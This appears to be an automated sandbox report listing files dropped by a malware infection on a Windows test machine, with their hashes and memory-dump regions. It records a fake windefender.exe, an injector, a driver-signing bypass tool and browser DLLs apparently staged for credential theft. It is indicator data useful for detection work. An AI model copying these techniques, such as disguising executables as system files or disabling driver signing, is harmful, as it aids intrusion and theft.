SHA256 67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA512 1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

\Users\Admin\Pictures\Qfj5AJ57kGhZwhnmVOfbif5t.exe

MD5 8bc396803bf0c509173078f354cb293b
SHA1 8a8e2298863cf6d5b5ad1c1f1efdb4f372f1cfa0
SHA256 e79bb6f916ff4f4bcca0dd2bb4c16233090265c38f3aeaa4a19bb125138773bb
SHA512 da3e916fb3b662584e3f1c8e5e6ac3c75c2f8aba0113597257cae5e9515944055e59d242efd08155939ea7044c7bf15a242f8d950e0a4a996889cbad1e20cd83

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 1c38721b3c88cae46ff360a9cae1c252
SHA1 456a9ea611bd198b99b75368eb87a47a6d965f2a
SHA256 c57f28924010286694a6dd6ffa7da2aeb71838e4f5f6eac80623f6969e0f8574
SHA512 d04775ccfb6bbf62b4f81c2066048635523bef0b6d18bb4affb8088e34a86bf0baafda6347429634d3fbd7462bad05a5cc4d030eda086e210cb69e28ba8ce6d5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c7e3d26d0c12841c73abeaac75d8d0dd
SHA1 59f837d364a00122cb874266f503162e7cdae161
SHA256 8bebbb03d232690315a6914ee28b18634bfb2d0ffc1b1240e6b629ff7a37afca
SHA512 2d6b20505d879204ba502575504467736a70bc2306013444204408c382fc6ec8f6ce7adc5dd3935b4c2eb0944caba1d2dd20bcf2fab038b4784e80c0a8a0065b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 c25e18712a5c1abef5e7c9d22aaed862
SHA1 3e19fd0321393494298b1cc7e2346f1b2648b7ce
SHA256 f394cb699ac4251014d83029032abe84dfb7859725efd2744841f8f71e1f37c8
SHA512 5d6f3e4600b9745f248fcdfed4d6341b57d4cca499abb96ab47d20cf78f89c86c997d377541b0e97eb07cd7471e297faf05f049ffa73a23eb4c635c70f3a225c

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f7d0172fd53c7e84752b814b793bca8d
SHA1 5cd578c188c8caad0224f480880c48697876a8aa
SHA256 8eaa8489902abad0d90ecf8e68d0bdab76bd38482fb18f4a2b5ded15266d653b
SHA512 a2488c4c5b7ecc3e8117841525f0d71932f5e4468daf231fba243ed0e8ba3015bd08ed4c5c528b6210f9be680da44fc1f0bff474c52e2683b6f97ce2ebe788d9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6B2043001D270792DFFD725518EAFE2C

MD5 65db0ef6c7c4fe524343673178a87eac
SHA1 ca01af95c377a27dc16bf9b9fa4078c73e1f1927
SHA256 64a17ac375693b9a3e6ffa6ff2e3b25ce37f3a68ef6a49139dd8fa8a0640090a
SHA512 bab608383c9421c681fe809df78754947926f5b7f14e4b080b743814c6e79822a1df4ded26b45dd67215eb61268258e441235e82570aefcbd215ad3133755520

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6B2043001D270792DFFD725518EAFE2C

MD5 f55da450a5fb287e1e0f0dcc965756ca
SHA1 7e04de896a3e666d00e687d33ffad93be83d349e
SHA256 31ad6648f8104138c738f39ea4320133393e3a18cc02296ef97c2ac9ef6731d0
SHA512 19bd9a319dfdaad7c13a6b085e51c67c0f9cb1eb4babc4c2b5cdf921c13002ca324e62dfa05f344e340d0d100aa4d6fac0683552162ccc7c0321a8d146da0630

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 490b90690a05bbb314761583224e5715
SHA1 96007425171471943f7f83e433b27a121c6f3633
SHA256 961453a873c000d37ebc39219c12fd8e8868a5b451f152b1fe6b55bf62ce8b4d
SHA512 d429561064f0285dedbb12df781dbe072986fcc75d4b44f620f598c0c6ec1d662370a9f793343b809cbd187e2144fa4fa615b768f797ea255a1b6783b1c3b1f5

C:\Users\Admin\Pictures\eQab8B2PxEYcbVAqDugdgqm1.exe

MD5 80fbcd8bcab6ddca53a467dfc54b2123
SHA1 5394a3de0dc598eeba66870d9070f54e8b137ede
SHA256 fff7af7e094a0f3d5e5b87eebbb5290e3d7570e192426e81909278abf8d0350b
SHA512 d7d14f7465da79ac9bfb1d88431e397e5f13fe7339f819b8e0404110bd73d10224d20c2b68178da3b7504de17c0b475f97ade83ab93d842310cf3baa605ac42c

memory/2828-780-0x0000000002810000-0x0000000002C08000-memory.dmp

memory/2596-792-0x00000000027D0000-0x0000000002BC8000-memory.dmp

memory/1524-804-0x0000000002660000-0x0000000002A58000-memory.dmp

memory/2764-805-0x0000000002860000-0x0000000002C58000-memory.dmp

memory/2596-807-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2828-806-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 55a23b43f7cd8868b13f6a4c57515f7e
SHA1 40336911fae7c0fd02003600d542024ab9c77413
SHA256 c6261cf654c880ea967d3b39fe5c5487a840d192640380f65cca7dc97d264e54
SHA512 728b31a2f34b7f2adf261620e56eb8dd7245f96013d561dc09ded376fe0ffd303f14af9aa2754db8dca21cb3a7a9d26689fde419818700c0fcb83a73562eef44

memory/2764-923-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/1760-924-0x0000000002710000-0x0000000002B08000-memory.dmp

memory/2804-935-0x0000000000400000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\Pictures\SDGCSh14AZaeoYIAQDvwVQYj.exe

MD5 e2a6c1f58b137874e490b8d94382fcdb
SHA1 71529c5d708091b1e1a580227dc52e62a140edd1
SHA256 4801879a7afb9d03f7edcbe76cd9306cb024d80abc8512c4995aa97e8fd52437
SHA512 24d12ce668e5189a4ba80520a4eaf480d17d3a07d8d0d4312964968f8489143df225881ec70e39e0c62e381061626801ead72d70cea164e2c3870bfbd7bc4eff

memory/1388-951-0x0000000000400000-0x0000000000B06000-memory.dmp

memory/1524-955-0x0000000000400000-0x0000000000ECD000-memory.dmp

\Users\Admin\AppData\Local\Temp\u25w.0.exe

MD5 a533c58be371236669106ab5243b05bb
SHA1 59e8eae350fd911b9d74940fd5a0793f6b4fddc0
SHA256 6f746358af1862e923dee83621f64d56b2e8d8f8936e71d4d6bc565e97e58b09
SHA512 83970ca812ebef5e7c7a4e32c6b6a48d0028f688241441fedfa00e9171592bbc6fa883f0bc7f2603d31f687b1510633bca5468b3ecb96481aa62451c85885f8d

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 13aaafe14eb60d6a718230e82c671d57
SHA1 e039dd924d12f264521b8e689426fb7ca95a0a7b
SHA256 f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3
SHA512 ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 f0616fa8bc54ece07e3107057f74e4db
SHA1 b33995c4f9a004b7d806c4bb36040ee844781fca
SHA256 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026
SHA512 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 468767fbc7f5c338c42142704826433a
SHA1 a6f1254afb90efe113719f402dbcfdc9bff7df3a
SHA256 a686cd27948944db1b37daa7fd2e6a0548cc309e8ffc9f3208a61877f64e2275
SHA512 d068daadf1e02798c92e901129394b26d4df48e4d43adfd930cbe954e8f412ed82bbdfbea611caeb8479de6507ae4b6f61d4e91e707bf210681d2f23556cea97

memory/2888-1020-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/2804-1049-0x0000000000400000-0x0000000000B0E000-memory.dmp

memory/1760-1050-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1057-0x0000000000400000-0x0000000000AEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\u25w.1.exe

MD5 397926927bca55be4a77839b1c44de6e
SHA1 e10f3434ef3021c399dbba047832f02b3c898dbd
SHA256 4f07e1095cc915b2d46eb149d1c3be14f3f4b4bd2742517265947fd23bdca5a7
SHA512 cf54136b977fc8af7e8746d78676d0d464362a8cfa2213e392487003b5034562ee802e6911760b98a847bddd36ad664f32d849af84d7e208d4648bd97a2fa954

memory/2804-1075-0x0000000000400000-0x0000000000B0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 29a469d0e67af4bec3840e86f46fd544
SHA1 18db114f40305d5f8293aeea485725a4b6efdb82
SHA256 014127e8b8bb6f624633cea726a1f4a3a9f68103f268887fee3517146e617cff
SHA512 6470aa3c045571bc8fde755cdc87e0cf9a2f4446f80d3fac3c9fb3affa7b23745f6ff61fe9ef54ee43d26e136311fb6202ec8d5a4c6183a31a238376e95bdb96

memory/1760-1101-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1103-0x0000000000400000-0x0000000000AEA000-memory.dmp

\ProgramData\nss3.dll

MD5 1cc453cdf74f31e4d913ff9c10acdde2
SHA1 6e85eae544d6e965f15fa5c39700fa7202f3aafe
SHA256 ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5
SHA512 dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

C:\Users\Admin\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

MD5 a97b5bc24fe8d5fdd5bb3a8a7b792a96
SHA1 7c0ae8eb28396e9e16af21fc92b40aa7286ced83
SHA256 ad514051449bc1b20b86737a021541f5c86d6948d4c148b510dbfc4593061b32
SHA512 0a7ca421237e1b2c2289b3f3f49ea38163bbb678343984697c8a658814358c9d22669af0d6a0b70991c55d1aada71effdbc424e68547e667579d5de9aef66fc1

memory/1760-1131-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/1344-1134-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/1344-1139-0x0000000000400000-0x00000000008AD000-memory.dmp

memory/2888-1142-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1176-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1186-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1202-0x0000000000400000-0x0000000000ECD000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 30497be1982f98a944dbc258b2c88970
SHA1 a196485d9e670d139434dc177c83343897871b3b
SHA256 4360dcb5d99353ef02f3115e4cffb2792dc96c04e805e94007291d1d64ff342d
SHA512 683a4e4899d68a15daa047eb7a21055b4ce838bcfe9c8a0f67db7bf6f068346082f4659b36ff996578c381e1164924e65a8677c129257c1709e1be38150d42de

C:\Users\Admin\AppData\Local\Microsoft\ApplicationInsights\81950f7e7cbd108086cf2da3a401afdfffc60d9b485aac5dd52f7a137c00f950\8f255cc5927e43afad97dd565bbe4e7c.tmp

MD5 8a0c5aeb8c295ef788117672a933a18e
SHA1 2d2f335b1e2d26a6fc5d02fa3f7a7c8954db2cb2
SHA256 17ee7d514faca7c6575c0890607c3aefeac04633a9967df1fcc2ffcd263e01bb
SHA512 dd185774c80bba1ae829c13587d89acea3e4a80d88c4e3a7644ab9cf63029a809997e90b43c315b48c5d9b110309e6d45873fbcf3db93f546d567b9ece984bd5

memory/2888-1234-0x0000000000400000-0x0000000000AEA000-memory.dmp

\Users\Admin\AppData\Local\Temp\CBKFBAECBA.exe

MD5 fe380780b5c35bd6d54541791151c2be
SHA1 7fe3a583cf91474c733f85cebf3c857682e269e1
SHA256 b64a84d1f88e4e78464a1901c1cb5bbd5f00bb73203d719e64e072157a087b53
SHA512 ba05ba8aa13c4bc1cf98fbf6c08b021e8b19354098e0397fc8e1e5d3dcce367c1063203f24e50d0973193f6535681d0a43486e5dade5d112853b7a2fe8739b6c

memory/1760-1242-0x0000000000400000-0x0000000000ECD000-memory.dmp

memory/2888-1238-0x0000000000400000-0x0000000000AEA000-memory.dmp

memory/1760-1254-0x0000000000400000-0x0000000000ECD000-memory.dmp

\Users\Admin\Pictures\GAGGKlG51O3Sq3EWazWTmdMP.exe

MD5 858bb0a3b4fa6a54586402e3ee117076
SHA1 997c31f043347883ea5ed2323a558b6cc5ea9c8e
SHA256 d97a7fc44bf341b9b2b2e65b46dab4f7d329afe15b4308b5aa56d5bfd7b99d35
SHA512 e8374b115f056b5d345c9b5f9c42b3d49e0640d7fad869448f686add6e52b783ecc7fd35ee15a67b944843491a91becf5b7c0bd5603eda01042dd2904c1ad8fd

memory/2260-1268-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1270-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1271-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

memory/2260-1272-0x000000013F3D0000-0x000000013FEDA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\windefender.exe

MD5 8e67f58837092385dcf01e8a2b4f5783
SHA1 012c49cfd8c5d06795a6f67ea2baf2a082cf8625
SHA256 166ddb03ff3c89bd4525ac390067e180fdd08f10fbcf4aadb0189541673c03fa
SHA512 40d8ae12663fc1851e171d9d86cea8bb12487b734c218d7b6f9742eb07d4ca265065cbd6d0bb908f8bda7e3d955c458dfe3fd13265bbf573b9351e0a2bf691ec